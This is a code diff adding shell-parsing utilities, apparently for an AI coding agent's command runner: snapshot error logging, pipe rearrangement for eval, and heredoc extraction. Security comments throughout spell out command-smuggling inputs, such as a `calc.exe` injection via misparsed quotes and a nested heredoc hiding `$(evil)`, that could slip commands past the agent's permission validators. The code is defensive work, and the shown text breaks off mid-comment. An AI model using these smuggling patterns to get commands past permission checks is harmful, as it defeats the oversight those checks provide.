+            logForDebugging(`  - Config file exists: ${configFileExists}`)
+            logForDebugging(`  - Working directory: ${getCwd()}`)
+            logForDebugging(`  - Claude home: ${getClaudeConfigHomeDir()}`)
+            logForDebugging(`Full snapshot script:\n${snapshotScript}`)
+            if (stdout) {
+              logForDebugging(
+                `stdout output (${stdout.length} chars):\n${stdout}`,
+              )
+            } else {
+              logForDebugging(`No stdout output captured`)
+            }
+            if (stderr) {
+              logForDebugging(
+                `stderr output (${stderr.length} chars): ${stderr}`,
+              )
+            } else {
+              logForDebugging(`No stderr output captured`)
+            }
+            logError(
+              new Error(`Failed to create shell snapshot: ${error.message}`),
+            )
+            // Convert signal name to number if present
+            const signalNumber = execError?.signal
+              ? os.constants.signals[
+                  execError.signal as keyof typeof os.constants.signals
+                ]
+              : undefined
+            logEvent('tengu_shell_snapshot_failed', {
+              stderr_length: stderr?.length || 0,
+              has_error_code: !!execError?.code,
+              error_signal_number: signalNumber,
+              error_killed: execError?.killed,
+            })
+            resolve(undefined)
+          } else {
+            let snapshotSize: number | undefined
+            try {
+              snapshotSize = (await stat(shellSnapshotPath)).size
+            } catch {
+              // Snapshot file not found
+            }
+
+            if (snapshotSize !== undefined) {
+              logForDebugging(
+                `Shell snapshot created successfully (${snapshotSize} bytes)`,
+              )
+
+              // Register cleanup to remove snapshot on graceful shutdown
+              registerCleanup(async () => {
+                try {
+                  await getFsImplementation().unlink(shellSnapshotPath)
+                  logForDebugging(
+                    `Cleaned up session snapshot: ${shellSnapshotPath}`,
+                  )
+                } catch (error) {
+                  logForDebugging(
+                    `Error cleaning up session snapshot: ${error}`,
+                  )
+                }
+              })
+
+              resolve(shellSnapshotPath)
+            } else {
+              logForDebugging(
+                `Shell snapshot file not found after creation: ${shellSnapshotPath}`,
+              )
+              logForDebugging(
+                `Checking if parent directory still exists: ${snapshotsDir}`,
+              )
+              try {
+                const dirContents =
+                  await getFsImplementation().readdir(snapshotsDir)
+                logForDebugging(
+                  `Directory contains ${dirContents.length} files`,
+                )
+              } catch {
+                logForDebugging(
+                  `Parent directory does not exist or is not accessible: ${snapshotsDir}`,
+                )
+              }
+              logEvent('tengu_shell_unknown_error', {})
+              resolve(undefined)
+            }
+          }
+        },
+      )
+    } catch (error) {
+      logForDebugging(`Unexpected error during snapshot creation: ${error}`)
+      if (error instanceof Error) {
+        logForDebugging(`Error stack trace: ${error.stack}`)
+      }
+      logError(error)
+      logEvent('tengu_shell_snapshot_error', {})
+      resolve(undefined)
+    }
+  })
+}
@@ -0,0 +1,294 @@
+import {
+  hasMalformedTokens,
+  hasShellQuoteSingleQuoteBug,
+  type ParseEntry,
+  quote,
+  tryParseShellCommand,
+} from './shellQuote.js'
+
+/**
+ * Rearranges a command with pipes to place stdin redirect after the first command.
+ * This fixes an issue where eval treats the entire piped command as a single unit,
+ * causing the stdin redirect to apply to eval itself rather than the first command.
+ *
+ * The command is only tokenized and rebuilt when shell-quote can represent it
+ * faithfully. In every other case (backticks, `$(`, variable or parameter
+ * references, control structures, real newlines, known shell-quote misparses,
+ * parse failures, or no pipe after a first command) the original text is
+ * single-quoted untouched and `< /dev/null` is attached to eval as a whole
+ * via quoteWithEvalStdinRedirect.
+ *
+ * @param command - Raw shell command text.
+ * @returns Text to be used as the eval argument(s): either the single-quoted
+ *   rebuilt pipeline `'first < /dev/null | rest'`, or the fallback form
+ *   `'command' < /dev/null`.
+ */
+export function rearrangePipeCommand(command: string): string {
+  // Skip if command has backticks - shell-quote doesn't handle them well
+  if (command.includes('`')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command has command substitution - shell-quote parses $() incorrectly,
+  // treating ( and ) as separate operators instead of recognizing command substitution
+  if (command.includes('$(')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command references shell variables or parameters: $VAR, ${VAR},
+  // positional parameters ($0-$9) and special parameters ($?, $$, $!, $#, $@,
+  // $*, $-). shell-quote's parse() expands all of these to empty string when
+  // no env is passed, silently dropping the reference. Even if we preserved the
+  // token via an env function, quote() would then escape the $ during rebuild,
+  // preventing runtime expansion. See #9732.
+  // The check is deliberately quote-blind: a false positive only costs us the
+  // rearrangement, never correctness, because the fallback keeps the text intact.
+  if (/\$[A-Za-z_{0-9?@#$!*-]/.test(command)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command contains bash control structures (for/while/until/if/case/select)
+  // shell-quote cannot parse these correctly and will incorrectly find pipes inside
+  // the control structure body, breaking the command when rearranged
+  if (containsControlStructure(command)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Join continuation lines before parsing: shell-quote doesn't handle \<newline>
+  // and produces empty string tokens for each occurrence, causing spurious empty
+  // arguments in the reconstructed command
+  const joined = joinContinuationLines(command)
+
+  // shell-quote treats bare newlines as whitespace, not command separators.
+  // Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
+  // silently merging pipelines. Line-continuation (\<newline>) is already stripped
+  // above; any remaining newline is a real separator. Bail to the eval fallback,
+  // which preserves the newline inside a single-quoted arg. See #32515.
+  if (joined.includes('\n')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // SECURITY: shell-quote treats \' inside single quotes as an escape, but
+  // bash treats it as literal \ followed by a closing quote. The pattern
+  // '\' <payload> '\' makes shell-quote merge <payload> into the quoted
+  // string, hiding operators like ; from the token stream. Rebuilding from
+  // that merged token can expose the operators when bash re-parses.
+  if (hasShellQuoteSingleQuoteBug(joined)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const parseResult = tryParseShellCommand(joined)
+
+  // If parsing fails (malformed syntax), fall back to quoting the whole command
+  if (!parseResult.success) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const parsed = parseResult.tokens
+
+  // SECURITY: shell-quote tokenizes differently from bash. Input like
+  // `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
+  // but shell-quote parses it into tokens with `;` as an operator and
+  // `calc.exe` as a separate word. Rebuilding from those tokens produces
+  // valid bash that executes `calc.exe` — turning a syntax error into an
+  // injection. Unbalanced delimiters in a string token signal this
+  // misparsing; fall back to whole-command quoting, which preserves the
+  // original (bash then rejects it with the same syntax error it would have
+  // raised without us).
+  if (hasMalformedTokens(joined, parsed)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const firstPipeIndex = findFirstPipeOperator(parsed)
+
+  // -1 means there is no pipe at all; 0 means the pipe has no command in front
+  // of it. Neither gives us a first command to attach the redirect to.
+  if (firstPipeIndex <= 0) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Rebuild: first_command < /dev/null | rest_of_pipeline
+  // (the second slice starts AT the pipe token, so the `|` itself is re-emitted)
+  const parts = [
+    ...buildCommandParts(parsed, 0, firstPipeIndex),
+    '< /dev/null',
+    ...buildCommandParts(parsed, firstPipeIndex, parsed.length),
+  ]
+
+  return singleQuoteForEval(parts.join(' '))
+}
+
+/**
+ * Locates the first `|` operator among the parsed shell tokens.
+ *
+ * @param parsed - Tokens produced by parsing a shell command.
+ * @returns Index of the first pipe operator, or -1 when there is none.
+ */
+function findFirstPipeOperator(parsed: ParseEntry[]): number {
+  return parsed.findIndex(token => isOperator(token, '|'))
+}
+
+/**
+ * Turns the parsed entries in the half-open range `[start, end)` back into
+ * shell source fragments, one fragment per emitted word or operator.
+ *
+ * - Simple file descriptor redirections (`2>&1`, `2>/dev/null`, `2> &1`) are
+ *   glued back together into a single fragment.
+ * - Leading `NAME=value` words keep their `NAME=` unquoted; only the value is
+ *   quoted. Any other string is quoted as a whole.
+ * - Glob entries are emitted as their raw pattern; other operators as their
+ *   operator text.
+ * - Entries that are neither strings nor operators are dropped.
+ *
+ * @param parsed - Parsed shell entries.
+ * @param start - Index of the first entry to emit (inclusive).
+ * @param end - Index at which to stop (exclusive).
+ * @returns The rebuilt fragments, in order.
+ */
+function buildCommandParts(
+  parsed: ParseEntry[],
+  start: number,
+  end: number,
+): string[] {
+  const rebuilt: string[] = []
+  // Assignments are only recognised before the first ordinary word of a
+  // command; the flag is re-armed after each command separator.
+  let assignmentsAllowed = true
+
+  let index = start
+  while (index < end) {
+    const token = parsed[index]
+
+    // e.g. 2>&1, 2>/dev/null: three entries collapse into one fragment
+    const fdRedirection = collapseFdRedirection(parsed, index, end)
+    if (fdRedirection !== undefined) {
+      rebuilt.push(fdRedirection)
+      index += 3 // consumed: descriptor, operator, target
+      continue
+    }
+
+    if (typeof token === 'string') {
+      if (assignmentsAllowed && isEnvironmentVariableAssignment(token)) {
+        // Keep `NAME=` bare so the shell still sees an assignment; quote only
+        // the value to protect spaces and special characters.
+        const equalsAt = token.indexOf('=')
+        const name = token.slice(0, equalsAt)
+        const value = token.slice(equalsAt + 1)
+        rebuilt.push(`${name}=${quote([value])}`)
+      } else {
+        // First ordinary word: everything after it is an argument
+        assignmentsAllowed = false
+        rebuilt.push(quote([token]))
+      }
+    } else if (isOperator(token)) {
+      if (token.op === 'glob' && 'pattern' in token) {
+        // Glob patterns must stay unquoted so the shell can still expand them
+        rebuilt.push(token.pattern as string)
+      } else {
+        rebuilt.push(token.op)
+        // The next command may carry its own assignments
+        if (isCommandSeparator(token.op)) {
+          assignmentsAllowed = true
+        }
+      }
+    }
+
+    index++
+  }
+
+  return rebuilt
+}
+
+/**
+ * Recognises a three-entry file descriptor redirection starting at `index`
+ * (descriptor `0`/`1`/`2`, a redirect operator, and a target that lies before
+ * `end`) and returns it as one fragment.
+ *
+ * @returns `N>&M`, `N>/dev/null`, or undefined when the entries at `index` do
+ *   not form one of the supported redirections.
+ */
+function collapseFdRedirection(
+  parsed: ParseEntry[],
+  index: number,
+  end: number,
+): string | undefined {
+  const descriptor = parsed[index]
+  if (typeof descriptor !== 'string' || !/^[012]$/.test(descriptor)) {
+    return undefined
+  }
+  // Both the operator and its target must lie inside the range
+  if (index + 2 >= end) {
+    return undefined
+  }
+  const operator = parsed[index + 1]
+  if (!isOperator(operator)) {
+    return undefined
+  }
+  const target = parsed[index + 2]
+
+  // 2>&1 style
+  if (operator.op === '>&') {
+    return typeof target === 'string' && /^[012]$/.test(target)
+      ? `${descriptor}>&${target}`
+      : undefined
+  }
+
+  if (operator.op !== '>') {
+    return undefined
+  }
+
+  // 2>/dev/null style
+  if (target === '/dev/null') {
+    return `${descriptor}>/dev/null`
+  }
+
+  // 2> &1 style (space between > and &1)
+  if (typeof target === 'string' && target.startsWith('&')) {
+    const duplicatedFd = target.slice(1)
+    if (/^[012]$/.test(duplicatedFd)) {
+      return `${descriptor}>&${duplicatedFd}`
+    }
+  }
+
+  return undefined
+}
+
+/**
+ * A name made of a letter or underscore followed by letters, digits or
+ * underscores, immediately followed by `=`, anchored at the start of the string.
+ */
+const ENV_ASSIGNMENT_PREFIX = /^[A-Za-z_][A-Za-z0-9_]*=/
+
+/**
+ * Tells whether a word has the shape of an environment variable assignment
+ * (`NAME=value`). Only the `NAME=` prefix is inspected; the value may be empty.
+ *
+ * @param str - The word to inspect.
+ * @returns true when the word starts with a valid variable name and `=`.
+ */
+function isEnvironmentVariableAssignment(str: string): boolean {
+  return ENV_ASSIGNMENT_PREFIX.test(str)
+}
+
+/**
+ * Checks if an operator is a command separator that starts a new command context.
+ * After these operators, environment variable assignments are valid again.
+ *
+ * Covers the list operators (`&&`, `||`, `;`), the pipeline operators (`|`,
+ * `|&`) and the background operator (`&`). Each stage of a pipeline is its own
+ * command, so in `a | b | FOO='x y' c` the word after the second `|` is an
+ * assignment. If it were not recognised as one, the whole word would be quoted
+ * (`'FOO=x y'`) and the shell would try to run it as a command name.
+ *
+ * @param op - Operator text as reported by the parser.
+ * @returns true when the next word begins a new command.
+ */
+function isCommandSeparator(op: string): boolean {
+  switch (op) {
+    case '&&':
+    case '||':
+    case ';':
+    case '|':
+    case '|&':
+    case '&':
+      return true
+    default:
+      return false
+  }
+}
+
+/**
+ * Type guard for operator entries: non-null objects that carry an `op` property.
+ *
+ * @param entry - Any parsed entry (or arbitrary value).
+ * @param op - When given (and non-empty), the entry's `op` must equal it.
+ * @returns true when `entry` is an operator and satisfies the optional filter.
+ */
+function isOperator(entry: unknown, op?: string): entry is { op: string } {
+  if (typeof entry !== 'object' || entry === null) {
+    return false
+  }
+  if (!('op' in entry)) {
+    return false
+  }
+  // No filter requested → any operator qualifies
+  return !op || entry.op === op
+}
+
+/**
+ * Detects bash control-structure keywords (for/while/until/if/case/select)
+ * that shell-quote cannot parse.
+ *
+ * A keyword only counts when it begins at a word boundary and is directly
+ * followed by whitespace, which keeps words that merely contain a keyword
+ * (e.g. `format`, `diff`) from matching.
+ *
+ * @param command - Shell command text.
+ * @returns true when such a keyword occurs anywhere in the command.
+ */
+function containsControlStructure(command: string): boolean {
+  const keywordAt = command.search(/\b(for|while|until|if|case|select)\s/)
+  return keywordAt !== -1
+}
+
+/**
+ * Fallback quoting: single-quotes the whole command and appends `< /dev/null`
+ * OUTSIDE the quotes, so the redirect is a shell redirect on eval itself
+ * rather than part of the text eval evaluates. Used for pipe commands whose
+ * pipe boundary we can't parse (e.g. commands with $(), backticks, or control
+ * structures).
+ *
+ * Result shape: eval 'cmd' < /dev/null
+ *   → eval's stdin is /dev/null, eval evaluates 'cmd', pipes inside work correctly
+ *
+ * The previous approach `quote([cmd, '<', '/dev/null'])` produced: eval 'cmd' \< /dev/null
+ *   → eval concatenates args to 'cmd < /dev/null', redirect applies to LAST pipe command
+ *
+ * @param command - Raw shell command text.
+ * @returns The single-quoted command followed by ` < /dev/null`.
+ */
+function quoteWithEvalStdinRedirect(command: string): string {
+  const quotedCommand = singleQuoteForEval(command)
+  return `${quotedCommand} < /dev/null`
+}
+
+/**
+ * Wraps a string in single quotes so it can be passed as one eval argument.
+ * Each embedded single quote becomes '"'"' (close the single-quoted run, emit
+ * a double-quoted single quote, reopen the single-quoted run).
+ *
+ * Preferred over shell-quote's quote(), which switches to double-quote mode
+ * when the input contains single quotes and then escapes ! -> \!, corrupting
+ * jq/awk filters like `select(.x != .y)` into `select(.x \!= .y)`.
+ *
+ * @param s - Text to quote.
+ * @returns The single-quoted form of `s`.
+ */
+function singleQuoteForEval(s: string): string {
+  const escapedBody = s.split("'").join(`'"'"'`)
+  return `'${escapedBody}'`
+}
+
+/**
+ * Removes shell line continuations (backslash immediately before a newline).
+ *
+ * Every run of backslashes that ends at a newline is examined:
+ * - odd length: the final backslash escapes the newline, so both are removed
+ *   and the remaining backslashes are kept;
+ * - even length: the backslashes pair up as escapes, the newline is a real
+ *   separator, and the text is left untouched.
+ *
+ * @param command - Shell command text, possibly spanning several lines.
+ * @returns The command with continuation lines joined.
+ */
+function joinContinuationLines(command: string): string {
+  return command.replace(/\\+\n/g, run => {
+    const slashes = run.length - 1 // the run ends with the newline
+    const isContinuation = slashes % 2 !== 0
+    // Dropping the last backslash and the newline leaves slashes - 1 backslashes
+    return isContinuation ? run.slice(0, slashes - 1) : run
+  })
+}
@@ -0,0 +1,733 @@
+/**
+ * Heredoc extraction and restoration utilities.
+ *
+ * The shell-quote library parses `<<` as two separate `<` redirect operators,
+ * which breaks command splitting for heredoc syntax. This module provides
+ * utilities to extract heredocs before parsing and restore them after.
+ *
+ * Supported heredoc variations:
+ * - <<WORD      - basic heredoc
+ * - <<'WORD'    - single-quoted delimiter (no variable expansion in content)
+ * - <<"WORD"    - double-quoted delimiter (with variable expansion)
+ * - <<-WORD     - dash prefix (strips leading tabs from content)
+ * - <<-'WORD'   - combined dash and quoted delimiter
+ *
+ * Known limitations:
+ * - Heredocs inside backtick command substitution may not be extracted
+ * - Very complex multi-heredoc scenarios may not be extracted
+ *
+ * When extraction fails, the command passes through unchanged. This is safe
+ * because the unextracted heredoc will either cause shell-quote parsing to fail
+ * (falling back to treating the whole command as one unit) or require manual
+ * approval for each apparent subcommand.
+ *
+ * @module
+ */
+
+import { randomBytes } from 'crypto'
+
+// Fixed text that opens and closes a heredoc placeholder token. The example in
+// the extractHeredocs documentation shows the overall shape:
+// `__HEREDOC_0_a1b2c3d4__`.
+// NOTE(review): presumably an index and a random salt go between the two —
+// confirm against the code that builds the placeholder.
+const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
+const HEREDOC_PLACEHOLDER_SUFFIX = '__'
+
+/**
+ * Produces a fresh random salt for heredoc placeholders, so that command text
+ * which literally contains "__HEREDOC_N__" cannot collide with a placeholder.
+ *
+ * @returns 16 lowercase hexadecimal characters (8 random bytes).
+ */
+function generatePlaceholderSalt(): string {
+  const saltBytes = randomBytes(8)
+  // Each byte is rendered as two hex digits
+  return saltBytes.toString('hex')
+}
+
+/**
+ * Regex pattern for matching heredoc start syntax.
+ *
+ * The leading `(?<!<)<<(?!<)` only accepts a `<<` that is neither preceded nor
+ * followed by another `<`, so `<<<` is never matched.
+ *
+ * Two alternatives handle quoted vs unquoted delimiters differently:
+ *
+ * Alternative 1 (quoted): (['"]) (\\?\w+) \2
+ *   Captures the opening quote, then the delimiter word (which MAY include a
+ *   leading backslash since it's literal inside quotes), then the closing quote.
+ *   In bash, single quotes make EVERYTHING literal including backslashes:
+ *     <<'\EOF' → delimiter is \EOF (with backslash)
+ *     <<'EOF'  → delimiter is EOF
+ *   Double quotes also preserve backslashes before non-special chars:
+ *     <<"\EOF" → delimiter is \EOF
+ *
+ * Alternative 2 (unquoted): \\?(\w+)
+ *   Optionally consumes a leading backslash (escape), then captures the word.
+ *   In bash, an unquoted backslash escapes the next character:
+ *     <<\EOF → delimiter is EOF (backslash consumed as escape)
+ *     <<EOF  → delimiter is EOF (plain)
+ *
+ * Capture groups:
+ *   1 - the `-` of `<<-`, when present
+ *   2 - the opening quote character, when the delimiter is quoted
+ *   3 - the delimiter word of a quoted delimiter (may start with a backslash)
+ *   4 - the delimiter word of an unquoted delimiter (leading backslash excluded)
+ *
+ * SECURITY: The backslash MUST be inside the capture group for quoted
+ * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
+ * the capture group unconditionally, causing <<'\EOF' to extract delimiter
+ * "EOF" while bash uses "\EOF", allowing command smuggling.
+ *
+ * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
+ * a security issue (could hide commands between << and the delimiter).
+ */
+const HEREDOC_START_PATTERN =
+  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
+  /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
+
+/**
+ * Describes one heredoc found in a command string: its text, its delimiter,
+ * and the index ranges of its operator and content. All indices are positions
+ * in the original command; "end" indices are exclusive.
+ */
+export type HeredocInfo = {
+  /** The full heredoc text including << operator, delimiter, content, and closing delimiter */
+  fullText: string
+  /** The delimiter word (without quotes) */
+  delimiter: string
+  /** Start position of the << operator in the original command */
+  operatorStartIndex: number
+  /** End position of the << operator (exclusive) - content on same line after this is preserved */
+  operatorEndIndex: number
+  /** Start position of heredoc content (the newline before content) */
+  contentStartIndex: number
+  /** End position of heredoc content including closing delimiter (exclusive) */
+  contentEndIndex: number
+}
+
+/**
+ * Result of extractHeredocs: the rewritten command together with the data
+ * needed to map each placeholder back to the heredoc it replaced. When nothing
+ * is extracted, `processedCommand` is the input command and `heredocs` is empty.
+ */
+export type HeredocExtractionResult = {
+  /** The command with heredocs replaced by placeholders */
+  processedCommand: string
+  /** Map of placeholder string to original heredoc info */
+  heredocs: Map<string, HeredocInfo>
+}
+
+/**
+ * Extracts heredocs from a command string and replaces them with placeholders.
+ *
+ * This allows shell-quote to parse the command without mangling heredoc syntax.
+ * After parsing, use `restoreHeredocs` to replace placeholders with original content.
+ *
+ * @param command - The shell command string potentially containing heredocs
+ * @returns Object containing the processed command and a map of placeholders to heredoc info
+ *
+ * @example
+ * ```ts
+ * const result = extractHeredocs(`cat <<EOF
+ * hello world
+ * EOF`);
+ * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
+ * // result.heredocs has the mapping to restore later
+ * ```
+ */
+export function extractHeredocs(
+  command: string,
+  options?: { quotedOnly?: boolean },
+): HeredocExtractionResult {
+  const heredocs = new Map<string, HeredocInfo>()
+
+  // Quick check: if no << present, skip processing
+  if (!command.includes('<<')) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Security: Paranoid pre-validation. Our incremental quote/comment scanner
+  // (see advanceScan below) does simplified parsing that cannot handle all
+  // bash quoting constructs. If the command contains
+  // constructs that could desync our quote tracking, bail out entirely
+  // rather than risk extracting a heredoc with incorrect boundaries.
+  // This is defense-in-depth: each construct below has caused or could
+  // cause a security bypass if we attempt extraction.
+  //
+  // Specifically, we bail if the command contains:
+  // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
+  //    doesn't handle the $ prefix, would misparse the quotes)
+  // 2. Backtick command substitution (backtick nesting has complex parsing
+  //    rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
+  //    make_cmd.c:606, enabling early heredoc closure that our parser
+  //    can't replicate)
+  if (/\$['"]/.test(command)) {
+    return { processedCommand: command, heredocs }
+  }
+  // Check for backticks in the command text before the first <<.
+  // Backtick nesting has complex parsing rules, and backtick acts as
+  // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
+  // heredoc closure that our parser can't replicate. We only check
+  // before << because backticks in heredoc body content are harmless.
+  const firstHeredocPos = command.indexOf('<<')
+  if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Security: Check for arithmetic evaluation context before the first `<<`.
+  // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
+  // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
+  // and are hidden from security validators, while bash executes them as
+  // separate commands. We bail entirely if `((` appears before `<<` without
+  // a matching `))` — we can't reliably distinguish arithmetic `<<` from
+  // heredoc `<<` in that context. Note: $(( is already caught by
+  // validateDangerousPatterns, but bare (( is not.
+  if (firstHeredocPos > 0) {
+    const beforeHeredoc = command.slice(0, firstHeredocPos)
+    // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
+    const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
+    const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
+    if (openArith > closeArith) {
+      return { processedCommand: command, heredocs }
+    }
+  }
+
+  // Create a global version of the pattern for iteration
+  const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
+
+  const heredocMatches: HeredocInfo[] = []
+  // Security: When quotedOnly skips an unquoted heredoc, we still need to
+  // track its content range so the nesting filter can reject quoted heredocs
+  // that appear INSIDE the skipped unquoted heredoc's body. Without this,
+  // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
+  // top-level heredoc, hiding $(evil) from validators — even though in bash,
+  // $(evil) IS executed (unquoted <<EOF expands its body).
+  const skippedHeredocRanges: Array<{
+    contentStartIndex: number
+    contentEndIndex: number
+  }> = []
+  let match: RegExpExecArray | null
+
+  // Incremental quote/comment scanner state.
+  //
+  // The regex walks forward through the command, and match.index is monotonically
+  // increasing. Previously, isInsideQuotedString and isInsideComment each
+  // re-scanned from position 0 on every match — O(n²) when the heredoc body
+  // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
+  // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
+  // calls extractHeredocs multiple times per command.
+  //
+  // Instead, track quote/comment/escape state incrementally and advance from
+  // the last scanned position. This preserves the OLD helpers' exact semantics:
+  //
+  //   Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
+  //   `#` and never skips characters for being "in a comment". Inside single
+  //   quotes, everything is literal. Inside double quotes, backslash escapes
+  //   the next char. An unquoted backslash run of odd length escapes the next
+  //   char.
+  //
+  //   Comment state (was isInsideComment) observes quote state (# inside quotes
+  //   is not a comment) but NOT the reverse. The old helper used a per-call
+  //   `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
+  //   equivalently, any physical `\n` clears comment state — including `\n`
+  //   inside quotes (since lastIndexOf was quote-blind).
+  //
+  // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
+  // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
+  // (where bash treats `#` as part of the word `x#`, NOT a comment) would
+  // report the `<<` as unquoted and EXTRACT it — hiding content from security
+  // validators. The old isInsideQuotedString was comment-blind; we preserve
+  // that. Both old and new over-eagerly treat any unquoted `#` as a comment
+  // (bash requires word-start), but since quote tracking is independent, the
+  // over-eagerness only affects the comment check — causing SKIPS (safe
+  // direction), never extra EXTRACTIONS.
+  let scanPos = 0
+  let scanInSingleQuote = false
+  let scanInDoubleQuote = false
+  let scanInComment = false
+  // Inside "...": true if the previous char was a backslash (next char is escaped).
+  // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
+  // the char at scanPos.
+  let scanDqEscapeNext = false
+  // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
+  // Used to determine if the char at scanPos is escaped (odd run = escaped).
+  let scanPendingBackslashes = 0
+
+  const advanceScan = (target: number): void => {
+    for (let i = scanPos; i < target; i++) {
+      const ch = command[i]!
+
+      // Any physical newline clears comment state. The old isInsideComment
+      // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
+      // `\n` inside quotes still advanced lineStart. Match that here by
+      // clearing BEFORE the quote branches.
+      if (ch === '\n') scanInComment = false
+
+      if (scanInSingleQuote) {
+        if (ch === "'") scanInSingleQuote = false
+        continue
+      }
+
+      if (scanInDoubleQuote) {
+        if (scanDqEscapeNext) {
+          scanDqEscapeNext = false
+          continue
+        }
+        if (ch === '\\') {
+          scanDqEscapeNext = true
+          continue
+        }
+        if (ch === '"') scanInDoubleQuote = false
+        continue
+      }
+
+      // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
+      // isInsideQuotedString): we do NOT skip chars for being inside a
+      // comment. Only the `#` detection itself is gated on not-in-comment.
+      if (ch === '\\') {
+        scanPendingBackslashes++
+        continue
+      }
+      const escaped = scanPendingBackslashes % 2 === 1
+      scanPendingBackslashes = 0
+      if (escaped) continue
+
+      if (ch === "'") scanInSingleQuote = true
+      else if (ch === '"') scanInDoubleQuote = true
+      else if (!scanInComment && ch === '#') scanInComment = true
+    }
+    scanPos = target
+  }
+
+  while ((match = heredocStartPattern.exec(command)) !== null) {
+    const startIndex = match.index
+
+    // Advance the incremental scanner to this match's position. After this,
+    // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
+    // state immediately BEFORE startIndex, and scanPendingBackslashes is the
+    // count of unquoted `\` immediately preceding startIndex.
+    advanceScan(startIndex)
+
+    // Skip if this << is inside a quoted string (not a real heredoc operator).
+    if (scanInSingleQuote || scanInDoubleQuote) {
+      continue
+    }
+
+    // Security: Skip if this << is inside a comment (after unquoted #).
+    // In bash, `# <<EOF` is a comment — extracting it would hide commands on
+    // subsequent lines as "heredoc content" while bash executes them.
+    if (scanInComment) {
+      continue
+    }
+
+    // Security: Skip if this << is preceded by an odd number of backslashes.
+    // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
+    // is input redirection. Extracting it would drop same-line commands from
+    // security checks. The scanner tracks the unquoted backslash run ending
+    // immediately before startIndex (scanPendingBackslashes).
+    if (scanPendingBackslashes % 2 === 1) {
+      continue
+    }
+
+    // Security: Bail if this `<<` falls inside the body of a previously
+    // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
+    // `<<` inside a heredoc body is just text — it's not a nested heredoc
+    // operator. Extracting it would hide content that bash actually expands.
+    let insideSkipped = false
+    for (const skipped of skippedHeredocRanges) {
+      if (
+        startIndex > skipped.contentStartIndex &&
+        startIndex < skipped.contentEndIndex
+      ) {
+        insideSkipped = true
+        break
+      }
+    }
+    if (insideSkipped) {
+      continue
+    }
+
+    const fullMatch = match[0]
+    const isDash = match[1] === '-'
+    // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
+    const delimiter = (match[3] || match[4])!
+    const operatorEndIndex = startIndex + fullMatch.length
+
+    // Security: Two checks to verify our regex captured the full delimiter word.
+    // Any mismatch between our parsed delimiter and bash's actual delimiter
+    // could allow command smuggling past permission checks.
+
+    // Check 1: If a quote was captured (group 2), verify the closing quote
+    // was actually matched by \2 in the regex (the quoted alternative requires
+    // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
+    // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
+    // early, leaving the closing quote unmatched.
+    // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
+    // should be "EO F" but we'd use "EO". Skip to prevent mismatch.
+    const quoteChar = match[2]
+    if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
+      continue
+    }
+
+    // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
+    // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
+    // expansion in the heredoc body — content is literal text. Unquoted
+    // delimiters (<<EOF) perform full shell expansion: $(), backticks,
+    // and ${} in the body ARE executed. When quotedOnly is set, skip
+    // unquoted heredocs so their bodies remain visible to security
+    // validators (they may contain executable command substitutions).
+    const isEscapedDelimiter = fullMatch.includes('\\')
+    const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
+    // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
+    // set. Instead, we compute their content range and add them to
+    // skippedHeredocRanges, then skip them AFTER finding the closing
+    // delimiter. This lets the nesting filter correctly reject quoted
+    // "heredocs" that appear inside unquoted heredoc bodies.
+
+    // Check 2: Verify the next character after our match is a bash word
+    // terminator (metacharacter or end of string). Characters like word chars,
+    // quotes, $, \ mean the bash word extends beyond our match
